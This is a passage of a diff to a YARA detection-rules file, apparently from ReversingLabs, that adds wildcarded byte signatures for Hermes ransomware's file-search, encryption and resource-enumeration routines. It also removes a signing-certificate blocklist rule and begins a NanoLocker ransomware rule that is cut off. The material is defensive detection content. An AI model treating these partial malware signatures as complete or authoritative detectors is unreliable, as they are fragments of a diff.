+            ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59
+            85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F
+            85 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F
+            85 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D
+        }
+		$hermes_find_files_v1_p4 = {
+            45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 45
+            ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? F6 85
+            ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 53 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 8B C8 E8 ?? ?? ?? ?? 83 F8 ?? 7E ?? 53 FF 75
+            ?? FF 75 ?? E8
+        }
+		$hermes_encrypt_files_v1_p1 = {
+            55 8B EC 83 EC ?? 53 56 57 FF 75 ?? FF 15 ?? ?? ?? ?? BB ?? ?? ?? ?? 3B C3 74 ?? 53
+            FF 75 ?? FF 15 ?? ?? ?? ?? 33 F6 56 53 6A ?? 56 56 68 ?? ?? ?? ?? FF 75 ?? FF 15 ??
+            ?? ?? ?? 89 45 ?? 3B C6 0F 84 ?? ?? ?? ?? 8D 4D ?? 51 50 FF 15 ?? ?? ?? ?? 89 45 ??
+            83 F8 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 82 ?? ?? ?? ?? 56 89 45 ?? 8D 45 ?? 50 56 56
+            6A ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? BF ?? ?? ?? ?? 57 FF 75 ?? 56
+            FF 15 ?? ?? ?? ?? 89 45 ?? 3B C6 74 ?? 56 8D 4D ?? 51 FF 75 ?? 89 75 ?? 50 FF 75 ??
+            FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 8B 4D ?? 8D 44 08 ?? 80 38 ?? 75 ?? 80 78 ??
+            ?? 75 ?? 80 78 ?? ?? 75 ?? 80 78 ?? ?? 75 ?? 80 78 ?? ?? 75 ?? 80 78 ?? ?? 75 ?? FF
+            75 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 33 C0 5F 5E 5B
+        }
+		$hermes_encrypt_files_v1_p2 = {
+            C9 C3 FF 75 ?? 8D 45 ?? 50 51 56 6A ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56
+            56 56 FF 75 ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 E8 ?? ?? ??
+            ?? 6A ?? 57 FF 75 ?? 88 45 ?? 56 FF 15 ?? ?? ?? ?? 8B F8 89 7D ?? 3B FE 74 ?? FF 75
+            ?? 0F BE 45 ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 56 8D 45 ?? 50 FF 75 ?? 89 75 ?? 57 FF
+            75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? BF ?? ?? ?? ?? 57 56 FF 75 ?? FF 15
+            ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 56 53 6A ?? 56 56 68 ?? ?? ?? ?? FF 75 ?? FF
+            15 ?? ?? ?? ?? 8B D8 3B DE 0F 84 ?? ?? ?? ?? 56 8D 45 ?? 50 FF 75 ?? 89 75 ?? FF 75
+            ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 56 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ??
+            53 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 57 56 FF
+            75 ?? FF 15 ?? ?? ?? ?? 33 C0 40 E9
+        }
+		$hermes_enum_resources_v1 = {
+            55 8B EC 83 EC ?? 53 56 57 8D 45 ?? 50 FF 75 ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A
+            ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? 6A ?? FF
+            15 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? FF 75 ?? 6A ?? 53 E8 ?? ?? ?? ?? 83 C4
+            ?? 8D 45 ?? 50 53 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B
+            43 ?? 66 83 38 ?? 8D 48 ?? 75 ?? 66 83 78 ?? ?? 75 ?? 6A ?? 51 E8 ?? ?? ?? ?? 59 59
+            85 C0 74 ?? 8B 43 ?? 8B D0 66 8B 08 40 40 66 85 C9 75 ?? 8B 7D ?? 2B C2 4F 4F 66 8B
+            4F ?? 47 47 66 85 C9 75 ?? 8B C8 C1 E9 ?? 8B F2 F3 A5 8B C8 83 E1 ?? F3 A4 8B 7D ??
+            4F 4F 66 8B 47 ?? 47 47 66 85 C0 75 ?? BE ?? ?? ?? ?? A5 8B 43 ?? 83 E0 ?? 3C ?? 0F
+            85 ?? ?? ?? ?? FF 75 ?? 53 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 33 C0 5F 5E
+            5B C9 C3 33 C0 40 EB
+        }
+		$hermes_encrypt_files_v2_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 33 C0 8D BD ?? ?? ?? ?? AB 33 DB 89 5D ?? AB AB
+            AB 8B 7D ?? 57 FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? 56 57 FF 15 ?? ?? ?? ?? 53 56 6A ??
+            53 53 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B F0 85 F6 75 ?? 53 FF 15 ?? ?? ?? ?? 33
+            C0 E9 ?? ?? ?? ?? 33 DB 33 C0 89 5D ?? 0F 57 C0 89 45 ?? 66 0F 13 45 ?? 83 FE ?? 74
+            ?? 8D 45 ?? 50 56 FF 15 ?? ?? ?? ?? 8D 45 ?? 50 56 FF 15 ?? ?? ?? ?? 8B 5D ?? 8B 45
+            ?? 83 FB ?? 75 ?? 85 C0 75 ?? 33 FF 47 E9 ?? ?? ?? ?? 83 65 ?? ?? 83 7D ?? ?? 77 ??
+            81 7D ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ??
+            6A ?? 6A ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 8B 4D ??
+            89 45 ?? 83 F9 ?? 72 ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 76 ?? 6A ?? 6A ?? 51 FF 75 ?? E8
+            ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 89 45 ?? 3D ?? ?? ?? ?? 76 ??
+            C7 45 ?? ?? ?? ?? ?? EB ?? 8B 55 ?? 8B C1 81 C2 ?? ?? ?? ?? 83 D0 ?? 83 F8 ?? 77 ??
+            72 ?? 81 FA ?? ?? ?? ?? 77 ?? 6A ?? 6A ?? 51 FF 75 ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 52
+            50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 89 45 ?? EB ?? 83 F9
+        }
+		$hermes_encrypt_files_v2_p2 = {
+            77 ?? 72 ?? 81 7D ?? ?? ?? ?? ?? 73 ?? 8B 45 ?? EB ?? 8B 45 ?? 3D ?? ?? ?? ?? 0F 87
+            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 77 ?? 0F 82 ?? ?? ?? ?? 83 7D ?? ??
+            0F 82 ?? ?? ?? ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 83 7D ?? ?? B8 ?? ?? ?? ?? 77 ?? 39
+            45 ?? 0F 86 ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? 2B D8 53 56 89 5D ?? FF 15 ?? ?? ?? ??
+            83 F8 ?? 75 ?? 6A ?? 58 E9 ?? ?? ?? ?? 33 DB 8D 45 ?? 53 50 6A ?? 8D 85 ?? ?? ?? ??
+            89 5D ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? EB ?? 8B C3 80 BC 05 ?? ?? ?? ??
+            ?? 75 ?? 80 BC 05 ?? ?? ?? ?? ?? 75 ?? 80 BC 05 ?? ?? ?? ?? ?? 75 ?? 80 BC 05 ?? ??
+            ?? ?? ?? 75 ?? 80 BC 05 ?? ?? ?? ?? ?? 75 ?? 80 BC 05 ?? ?? ?? ?? ?? 74 ?? 40 83 F8
+            ?? 72 ?? 53 53 53 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 6A ?? E9 ?? ?? ??
+            ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 58 6A ?? 66 89 45 ?? 58 66 89 45 ?? 6A ?? 58 66 89 45
+            ?? 33 C0 66 89 45 ?? 8D 45 ?? 50 57 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 6A ?? 68 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 57 56 89 1E E8 ?? ?? ??
+            ?? 57 56 E8 ?? ?? ?? ?? 8D 45 ?? 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 56 57 FF 15 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 53 56 FF 15 ?? ?? ?? ?? 6A ?? E9 ?? ?? ?? ?? 33 DB 8D 45
+        }
+		$hermes_encrypt_files_v2_p3 = {
+            50 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? E9 ?? ?? ?? ??
+            39 5D ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 77 ?? 53 53 68 ?? ?? ?? ?? FF 75 ?? FF 75 ?? E8
+            ?? ?? ?? ?? 89 5D ?? 5B 6A ?? 89 4D ?? 33 DB 89 45 ?? 89 55 ?? 5F EB ?? 8B 45 ?? 89
+            45 ?? 53 69 C0 ?? ?? ?? ?? 53 50 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 6A ?? E9 ?? ??
+            ?? ?? 53 8D 45 ?? 89 5D ?? 50 6A ?? 5F 57 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ??
+            85 C0 75 ?? 6A ?? E9 ?? ?? ?? ?? 53 53 53 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 6A ??
+            E9 ?? ?? ?? ?? 89 5D ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B
+            D8 85 DB 75 ?? 6A ?? E9 ?? ?? ?? ?? 8B 55 ?? 33 C9 33 C0 C7 45 ?? ?? ?? ?? ?? 89 4D
+            ?? 89 45 ?? 83 65 ?? ?? C7 45 ?? ?? ?? ?? ?? 3B CA 75 ?? 8B 4D ?? 89 4D ?? C7 45 ??
+            ?? ?? ?? ?? 33 C9 51 51 50 56 89 4D ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ??
+            6A ?? 8D 45 ?? 50 FF 75 ?? 53 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 33 C9 C7
+        }
+		$hermes_encrypt_files_v2_p4 = {
+            45 ?? ?? ?? ?? ?? 51 8D 45 ?? 50 51 51 FF 75 ?? 51 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0
+            0F 84 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? 50 53 6A ?? FF 75 ?? 6A ?? FF 75 ?? FF 15 ?? ??
+            ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F
+            84 ?? ?? ?? ?? 83 65 ?? ?? 8D 45 ?? 6A ?? 50 FF 75 ?? 53 56 FF 15 ?? ?? ?? ?? 85 C0
+            0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 45 ?? 41 8B 55 ?? 05 ?? ?? ?? ?? 89 4D ?? 89 45 ?? 3B
+            CA 0F 86 ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 8D 7D ?? 66 C7 45 ?? ?? ?? AB AB AB
+            AB 66 AB 33 C0 88 45 ?? 39 45 ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 77 ?? 8D 45 ?? 50 8D 45
+            ?? 50 E8 ?? ?? ?? ?? 59 59 EB ?? 6A ?? 50 50 50 56 FF 15 ?? ?? ?? ?? 33 C0 8D 7D ??
+            AB 6A ?? AB 66 AB 8D 45 ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 8D 45 ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 FF 8D 45 ?? 57 50 8D
+            45 ?? 89 7D ?? 50 E8 ?? ?? ?? ?? 59 50 8D 45 ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ??
+            68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ?? ?? 6A ?? E9 ?? ?? ?? ?? 8D 45 ?? 50 57 57 6A
+        }
+		$hermes_encrypt_files_v2_p5 = {
+            FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ??
+            ?? 6A ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 57 6A ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85
+            C0 75 ?? 68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ?? ?? 6A ?? E9 ?? ?? ?? ?? 57 8D 45 ?? 89
+            7D ?? 50 FF 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ??
+            ?? 57 53 FF 15 ?? ?? ?? ?? 6A ?? E9 ?? ?? ?? ?? 39 7D ?? 77 ?? 81 7D ?? ?? ?? ?? ??
+            76 ?? 6A ?? 57 0F 57 C0 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 56 FF 15 ?? ?? ?? ?? 83 F8
+            ?? 75 ?? 68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ?? ?? 6A ?? EB ?? 57 8D 45 ?? 89 7D ?? 50
+            6A ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 57 53 FF
+            15 ?? ?? ?? ?? 6A ?? EB ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 53 E8 ?? ?? ?? ??
+            83 C4 ?? 68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ?? ?? 6A ?? 5B EB ?? 68 ?? ?? ?? ?? 6A ??
+            53 FF 15 ?? ?? ?? ?? 6A ?? 5B 56 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B C3
+            EB ?? FF 75 ?? FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? EB ?? FF 75 ?? FF 15 ??
+            ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? EB ?? FF 75 ?? FF 15 ?? ?? ?? ?? 56 FF 15 ?? ??
+            ?? ?? 6A ?? 5F EB ?? 6A ?? 5F 56 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 6A ?? 53 FF 15 ?? ?? ?? ?? EB ?? 6A ?? E9 ?? ?? ?? ?? 6A ?? 5F 56 FF 15 ??
+            ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C3
+        }
+		$hermes_find_files_v2_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 8B 5D ?? 8D 85 ?? ?? ?? ?? 56 57 50 68 ?? ?? ?? ?? 53
+            E8 ?? ?? ?? ?? 59 59 50 FF 15 ?? ?? ?? ?? 8B F8 68 ?? ?? ?? ?? 53 89 7D ?? E8 ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 53 8B F0 E8 ?? ?? ?? ?? 2B C6 33 C9 83 C4 ?? 66 89 0C 43 83
+            FF ?? 0F 84 ?? ?? ?? ?? 33 F6 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 83 F8 ?? 75 ??
+            8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 57
+            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 83
+            F8 ?? 75 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 8D
+            85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 58 6A ?? 5F 6A
+            ?? 5A 6A ?? 66 89 45 ?? 58 6A ?? 59 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ??
+            66 89 45 ?? 33 C0 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 66 89
+        }
+		$hermes_find_files_v2_p2 = {
+            45 ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 33 C0 66 89 45 ?? 58 6A ?? 66 89 45
+            ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 33 C0 66 89 55 ??
+            66 89 55 ?? 5A 6A ?? 66 89 45 ?? 58 6A ?? 66 89 85 ?? ?? ?? ?? 58 6A ?? 66 89 4D ??
+            66 89 4D ?? 66 89 8D ?? ?? ?? ?? 59 66 89 85 ?? ?? ?? ?? 6A ?? 58 66 89 85 ?? ?? ??
+            ?? 33 C0 66 89 7D ?? 66 89 BD ?? ?? ?? ?? 8D 7D ?? 89 75 ?? 66 89 75 ?? 66 89 55 ??
+            89 75 ?? 66 89 75 ?? 66 89 8D ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? 66 89 85 ?? ?? ?? ??
+            AB 6A ?? 66 89 4D ?? 66 89 55 ?? AB 66 89 55 ?? 89 75 ?? AB 66 AB 58 6A ?? 66 89 45
+            ?? 58 6A ?? 5F 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ??
+            66 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 59 66 89 45 ?? 33 C0 66 89 45 ?? 6A ?? 58
+            66 89 85 ?? ?? ?? ?? 6A ?? 58 66 89 85 ?? ?? ?? ?? 6A ?? 58 66 89 85 ?? ?? ?? ?? 6A
+            ?? 58 66 89 85 ?? ?? ?? ?? 6A ?? 58 66 89 85 ?? ?? ?? ?? 33 C0 66 89 7D ?? 66 89 7D
+            ?? 8D BD ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? 66 89 8D
+        }
+		$hermes_find_files_v2_p3 = {
+            AB AB AB 66 AB 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D
+            45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45 ?? 50 8D 85 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ??
+            50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
+            59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85
+            C0 0F 84 ?? ?? ?? ?? 8B 7D ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45
+            ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45 ?? 50 8D 85 ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59
+            59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0
+        }
+		$hermes_find_files_v2_p4 = {
+            0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 8D 45 ?? 50 8D 85
+            ?? ?? ?? ?? 50 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 45
+            ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 50
+            8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 50 8D
+            85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
+            8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? EB ?? 8B 7D ?? F6 85 ?? ?? ??
+            ?? ?? 74 ?? 53 E8 ?? ?? ?? ?? 59 FF 75 ?? 8D 85 ?? ?? ?? ?? FF 75 ?? FF 75 ?? 50 53
+            E8 ?? ?? ?? ?? 59 59 50 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8B F0 8D
+            85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 2B F0 83 C4 ?? 33 C0 66 89 44 73 ?? 33 F6 8D 85 ??
+            ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 5F 5E
+            5B 8B E5 5D C3
+        }
+		$hermes_enum_resources_v2 = {
+            55 8B EC 83 EC ?? 53 56 57 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 FF 75 ?? 33 DB C7 45 ??
+            ?? ?? ?? ?? 53 53 6A ?? 89 5D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ??
+            6A ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D
+            45 ?? 50 56 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 7E ?? 6A ?? 58 66
+            39 07 75 ?? 66 39 47 ?? 75 ?? 50 8D 47 ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 57 FF
+            75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? F7 46 ?? ?? ??
+            ?? ?? 74 ?? FF 75 ?? 56 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 33 C0 5F 5E 5B 8B E5 5D C3
+            33 C0 40 EB
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "UAB GT-servis" and pe.signatures [ i ] . serial == "07:5d:ca:9c:a8:4b:93:e8:a8:9b:77:51:28:f9:03:02" and 1579305601 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( ( all of ( $hermes_find_files_v1_p* ) ) and ( all of ( $hermes_encrypt_files_v1_p* ) ) ) or ( ( all of ( $hermes_find_files_v2_p* ) ) and ( all of ( $hermes_encrypt_files_v2_p* ) ) ) ) and ( any of ( $hermes_enum_resources_v* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0Ddce8Cdc91B5B649Bb4B45Ffbba6C6C : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Nanolocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects NanoLocker ransomware."
 		author = "ReversingLabs"
-		id = "9de11ec8-f408-593c-895f-08dff703ff10"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "a31dad2e-2738-527b-a6e9-322757e2ec30"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3734-L3750"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "622e6ed08ca26908539519f37cf493f8030100bd5e88cb05e851b7d56b0f4c0d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.NanoLocker.yara#L1-L79"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7fdb021f22d97bf8a00fd856ef913695a0d6fbaad1138b5a5cc2cc8768b130be"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "NanoLocker"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_file_1 = {
+            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 05 ?? ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6
